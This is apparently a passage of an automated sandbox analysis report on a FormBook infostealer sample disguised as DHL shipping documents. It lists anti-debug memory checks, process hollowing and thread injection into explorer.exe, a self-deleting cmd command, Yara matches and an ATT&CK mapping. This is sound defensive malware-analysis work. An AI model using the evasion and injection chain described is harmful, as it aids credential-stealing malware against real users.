Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015589E0 mov eax, dword ptr fs:[00000030h]	2_2_015589E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01504980 mov eax, dword ptr fs:[00000030h]	2_2_01504980
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F4995 mov eax, dword ptr fs:[00000030h]	2_2_014F4995
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F4995 mov eax, dword ptr fs:[00000030h]	2_2_014F4995
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01580985 mov eax, dword ptr fs:[00000030h]	2_2_01580985
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01580985 mov eax, dword ptr fs:[00000030h]	2_2_01580985
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01580985 mov eax, dword ptr fs:[00000030h]	2_2_01580985
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01580985 mov eax, dword ptr fs:[00000030h]	2_2_01580985
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01580985 mov eax, dword ptr fs:[00000030h]	2_2_01580985
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01580985 mov eax, dword ptr fs:[00000030h]	2_2_01580985
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01580985 mov eax, dword ptr fs:[00000030h]	2_2_01580985
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01580985 mov eax, dword ptr fs:[00000030h]	2_2_01580985
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01580985 mov eax, dword ptr fs:[00000030h]	2_2_01580985
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01580985 mov eax, dword ptr fs:[00000030h]	2_2_01580985
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01580985 mov eax, dword ptr fs:[00000030h]	2_2_01580985
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01580985 mov eax, dword ptr fs:[00000030h]	2_2_01580985
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01580985 mov eax, dword ptr fs:[00000030h]	2_2_01580985
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E09AB mov eax, dword ptr fs:[00000030h]	2_2_014E09AB
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E09AB mov eax, dword ptr fs:[00000030h]	2_2_014E09AB
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015029A9 mov eax, dword ptr fs:[00000030h]	2_2_015029A9
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015029A9 mov eax, dword ptr fs:[00000030h]	2_2_015029A9
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D69B0 mov eax, dword ptr fs:[00000030h]	2_2_014D69B0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D69B0 mov eax, dword ptr fs:[00000030h]	2_2_014D69B0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D69B0 mov eax, dword ptr fs:[00000030h]	2_2_014D69B0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D69B0 mov eax, dword ptr fs:[00000030h]	2_2_014D69B0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D69B0 mov eax, dword ptr fs:[00000030h]	2_2_014D69B0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D69B0 mov eax, dword ptr fs:[00000030h]	2_2_014D69B0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D69B0 mov eax, dword ptr fs:[00000030h]	2_2_014D69B0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01584870 mov eax, dword ptr fs:[00000030h]	2_2_01584870
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01584870 mov eax, dword ptr fs:[00000030h]	2_2_01584870
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FE870 mov eax, dword ptr fs:[00000030h]	2_2_014FE870
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01578812 mov eax, dword ptr fs:[00000030h]	2_2_01578812
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A2817 mov eax, dword ptr fs:[00000030h]	2_2_015A2817
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A2817 mov eax, dword ptr fs:[00000030h]	2_2_015A2817
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A2817 mov eax, dword ptr fs:[00000030h]	2_2_015A2817
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A2817 mov eax, dword ptr fs:[00000030h]	2_2_015A2817
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0158480B mov eax, dword ptr fs:[00000030h]	2_2_0158480B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0158480B mov eax, dword ptr fs:[00000030h]	2_2_0158480B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01500804 mov eax, dword ptr fs:[00000030h]	2_2_01500804
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159A800 mov eax, dword ptr fs:[00000030h]	2_2_0159A800
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01566820 mov eax, dword ptr fs:[00000030h]	2_2_01566820
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01566820 mov eax, dword ptr fs:[00000030h]	2_2_01566820
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0157E820 mov eax, dword ptr fs:[00000030h]	2_2_0157E820
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014C88C8 mov eax, dword ptr fs:[00000030h]	2_2_014C88C8
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014C88C8 mov eax, dword ptr fs:[00000030h]	2_2_014C88C8
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F68C2 mov eax, dword ptr fs:[00000030h]	2_2_014F68C2
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F68C2 mov eax, dword ptr fs:[00000030h]	2_2_014F68C2
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F68C2 mov eax, dword ptr fs:[00000030h]	2_2_014F68C2
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155C8C0 mov eax, dword ptr fs:[00000030h]	2_2_0155C8C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015548CF mov eax, dword ptr fs:[00000030h]	2_2_015548CF
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E28F0 mov eax, dword ptr fs:[00000030h]	2_2_014E28F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E28F0 mov eax, dword ptr fs:[00000030h]	2_2_014E28F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E28F0 mov eax, dword ptr fs:[00000030h]	2_2_014E28F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E28F0 mov eax, dword ptr fs:[00000030h]	2_2_014E28F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E28F0 mov eax, dword ptr fs:[00000030h]	2_2_014E28F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E28F0 mov eax, dword ptr fs:[00000030h]	2_2_014E28F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E28F0 mov eax, dword ptr fs:[00000030h]	2_2_014E28F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E28F0 mov eax, dword ptr fs:[00000030h]	2_2_014E28F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E28F0 mov eax, dword ptr fs:[00000030h]	2_2_014E28F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E28F0 mov eax, dword ptr fs:[00000030h]	2_2_014E28F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E28F0 mov eax, dword ptr fs:[00000030h]	2_2_014E28F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E28F0 mov eax, dword ptr fs:[00000030h]	2_2_014E28F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E28F0 mov eax, dword ptr fs:[00000030h]	2_2_014E28F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150C8B9 mov eax, dword ptr fs:[00000030h]	2_2_0150C8B9
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150C8B9 mov eax, dword ptr fs:[00000030h]	2_2_0150C8B9
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0157E8A0 mov eax, dword ptr fs:[00000030h]	2_2_0157E8A0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D8B50 mov eax, dword ptr fs:[00000030h]	2_2_014D8B50
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D8B50 mov eax, dword ptr fs:[00000030h]	2_2_014D8B50
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D8B50 mov eax, dword ptr fs:[00000030h]	2_2_014D8B50
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0B50 mov eax, dword ptr fs:[00000030h]	2_2_014E0B50
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0B50 mov eax, dword ptr fs:[00000030h]	2_2_014E0B50
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0B50 mov eax, dword ptr fs:[00000030h]	2_2_014E0B50
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0B50 mov eax, dword ptr fs:[00000030h]	2_2_014E0B50
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155CB70 mov eax, dword ptr fs:[00000030h]	2_2_0155CB70
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155CB70 mov eax, dword ptr fs:[00000030h]	2_2_0155CB70
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155CB70 mov eax, dword ptr fs:[00000030h]	2_2_0155CB70
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0B0E mov eax, dword ptr fs:[00000030h]	2_2_014E0B0E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0B0E mov eax, dword ptr fs:[00000030h]	2_2_014E0B0E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014C8B00 mov eax, dword ptr fs:[00000030h]	2_2_014C8B00
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CCB1E mov eax, dword ptr fs:[00000030h]	2_2_014CCB1E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F0B1B mov eax, dword ptr fs:[00000030h]	2_2_014F0B1B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F0B1B mov eax, dword ptr fs:[00000030h]	2_2_014F0B1B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F0B1B mov eax, dword ptr fs:[00000030h]	2_2_014F0B1B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A2B0F mov eax, dword ptr fs:[00000030h]	2_2_015A2B0F
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A2B0F mov eax, dword ptr fs:[00000030h]	2_2_015A2B0F
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01566B00 mov eax, dword ptr fs:[00000030h]	2_2_01566B00
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01566B00 mov eax, dword ptr fs:[00000030h]	2_2_01566B00
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01566B00 mov ecx, dword ptr fs:[00000030h]	2_2_01566B00
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D0B2D mov eax, dword ptr fs:[00000030h]	2_2_014D0B2D
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D0B2D mov eax, dword ptr fs:[00000030h]	2_2_014D0B2D
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D0B2D mov eax, dword ptr fs:[00000030h]	2_2_014D0B2D
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01550B3F mov eax, dword ptr fs:[00000030h]	2_2_01550B3F
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01550B3F mov eax, dword ptr fs:[00000030h]	2_2_01550B3F
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01550B3F mov eax, dword ptr fs:[00000030h]	2_2_01550B3F
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014CEBC0 mov eax, dword ptr fs:[00000030h]	2_2_014CEBC0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150CBC0 mov eax, dword ptr fs:[00000030h]	2_2_0150CBC0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01586BC0 mov eax, dword ptr fs:[00000030h]	2_2_01586BC0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0156AB90 mov eax, dword ptr fs:[00000030h]	2_2_0156AB90
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0156AB90 mov eax, dword ptr fs:[00000030h]	2_2_0156AB90
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01586B90 mov ecx, dword ptr fs:[00000030h]	2_2_01586B90
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FEBAC mov eax, dword ptr fs:[00000030h]	2_2_014FEBAC
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DABB0 mov eax, dword ptr fs:[00000030h]	2_2_014DABB0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DABB0 mov eax, dword ptr fs:[00000030h]	2_2_014DABB0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DABB0 mov eax, dword ptr fs:[00000030h]	2_2_014DABB0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DABB0 mov eax, dword ptr fs:[00000030h]	2_2_014DABB0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DABB0 mov eax, dword ptr fs:[00000030h]	2_2_014DABB0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DABB0 mov eax, dword ptr fs:[00000030h]	2_2_014DABB0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D6BB0 mov eax, dword ptr fs:[00000030h]	2_2_014D6BB0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D6BB0 mov eax, dword ptr fs:[00000030h]	2_2_014D6BB0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D6BB0 mov eax, dword ptr fs:[00000030h]	2_2_014D6BB0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01508A50 mov edx, dword ptr fs:[00000030h]	2_2_01508A50
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01526A56 mov eax, dword ptr fs:[00000030h]	2_2_01526A56
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01568A4B mov eax, dword ptr fs:[00000030h]	2_2_01568A4B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01526A7E mov eax, dword ptr fs:[00000030h]	2_2_01526A7E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01526A7E mov eax, dword ptr fs:[00000030h]	2_2_01526A7E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01526A7E mov eax, dword ptr fs:[00000030h]	2_2_01526A7E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01598A6E mov eax, dword ptr fs:[00000030h]	2_2_01598A6E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01598A6E mov eax, dword ptr fs:[00000030h]	2_2_01598A6E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A4A6D mov eax, dword ptr fs:[00000030h]	2_2_015A4A6D
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D8A00 mov eax, dword ptr fs:[00000030h]	2_2_014D8A00
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D8A00 mov eax, dword ptr fs:[00000030h]	2_2_014D8A00
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D0A30 mov eax, dword ptr fs:[00000030h]	2_2_014D0A30
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150CA2F mov eax, dword ptr fs:[00000030h]	2_2_0150CA2F
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150CA2F mov eax, dword ptr fs:[00000030h]	2_2_0150CA2F
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150CA2F mov eax, dword ptr fs:[00000030h]	2_2_0150CA2F
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01570AD0 mov eax, dword ptr fs:[00000030h]	2_2_01570AD0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01570AD0 mov eax, dword ptr fs:[00000030h]	2_2_01570AD0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FEAD0 mov eax, dword ptr fs:[00000030h]	2_2_014FEAD0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FEAD0 mov eax, dword ptr fs:[00000030h]	2_2_014FEAD0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01554A97 mov eax, dword ptr fs:[00000030h]	2_2_01554A97
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01554A97 mov eax, dword ptr fs:[00000030h]	2_2_01554A97
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01504A80 mov eax, dword ptr fs:[00000030h]	2_2_01504A80
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01504A80 mov eax, dword ptr fs:[00000030h]	2_2_01504A80
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150AAAE mov eax, dword ptr fs:[00000030h]	2_2_0150AAAE
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150AAAE mov eax, dword ptr fs:[00000030h]	2_2_0150AAAE
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01506D50 mov eax, dword ptr fs:[00000030h]	2_2_01506D50
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155CD50 mov eax, dword ptr fs:[00000030h]	2_2_0155CD50
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155CD50 mov eax, dword ptr fs:[00000030h]	2_2_0155CD50
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DAD40 mov eax, dword ptr fs:[00000030h]	2_2_014DAD40
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DAD40 mov eax, dword ptr fs:[00000030h]	2_2_014DAD40
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DAD40 mov eax, dword ptr fs:[00000030h]	2_2_014DAD40
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DAD40 mov eax, dword ptr fs:[00000030h]	2_2_014DAD40
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DAD40 mov eax, dword ptr fs:[00000030h]	2_2_014DAD40
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DAD40 mov eax, dword ptr fs:[00000030h]	2_2_014DAD40

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe

Code function: 2_2_0040ACF0 LdrLoadDll,

2_2_0040ACF0

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe

Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: 560000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe

Memory written: C:\Users\user\Desktop\DHL_Shipping_Documents.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Thread register set: target process: 4884			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread register set: target process: 4884			Jump to behavior

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process created: C:\Users\user\Desktop\DHL_Shipping_Documents.exe C:\Users\user\Desktop\DHL_Shipping_Documents.exe			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL_Shipping_Documents.exe"			Jump to behavior

Source: DHL_Shipping_Documents.exe, 00000002.00000002.1039297463.0000000003170000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3437321702.0000000000560000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: f+SSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShellsDefaultShell/NoShellRegistrationCheck/NoUACCheckProgman/NoShellRegistrationAndUACCheckLocal\ExplorerIsShellMutexProxy Desktop
Source: explorer.exe, 00000003.00000000.994598915.0000000001050000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3439810207.0000000001050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.994598915.0000000001050000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000003.2776327418.000000000BA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BA01000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.994598915.0000000001050000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.994482396.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3439810207.0000000001050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: DHL_Shipping_Documents.exe, 00000002.00000002.1039297463.0000000003170000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3437321702.0000000000560000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: >Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.994598915.0000000001050000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3439810207.0000000001050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Queries volume information: C:\Users\user\Desktop\DHL_Shipping_Documents.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.DHL_Shipping_Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.DHL_Shipping_Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.DHL_Shipping_Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.DHL_Shipping_Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Shared Modules	Path Interception	512 Process Injection	1 Rootkit	1 Credential API Hooking	121 Security Software Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	12 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
